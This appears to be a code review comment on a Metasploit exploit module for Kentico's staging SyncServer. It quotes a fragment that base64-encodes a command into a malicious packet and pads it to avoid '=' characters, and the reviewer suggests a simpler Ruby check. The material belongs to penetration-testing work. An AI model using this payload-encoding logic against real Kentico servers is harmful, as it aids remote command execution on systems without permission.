modules/exploits/windows/http/kentico_staging_syncserver.rb

```diff
@@ -0,0 +1,103 @@
+    packet = Rex::Text.encode_base64(pkt1+cmd+pkt2)
+    packet
+  end
+
+  def generate_valid_b64(cmd)
+    # Odd lengthed exploit commands return a base64 decoding error. Pad with spaces to satisfy without base64 '=' terminator
+    0.upto(3) do |padding|
+      b64 = generate_base64(cmd + " " * padding)
+
+      if (b64 =~ /^[^=]+$/) # If no '=' in base64 string
```

Comment:
This is shorter, easier to read, and removes the requirement for code comments:

```suggestion
      unless b64.include?('=')
```

or:

```ruby
    0.upto(3) do |padding|
      b64 = generate_base64(cmd + " " * padding)
      next if b64.include?('=')
      vprint_status("GOOD: " + b64)
      return b64
    end
```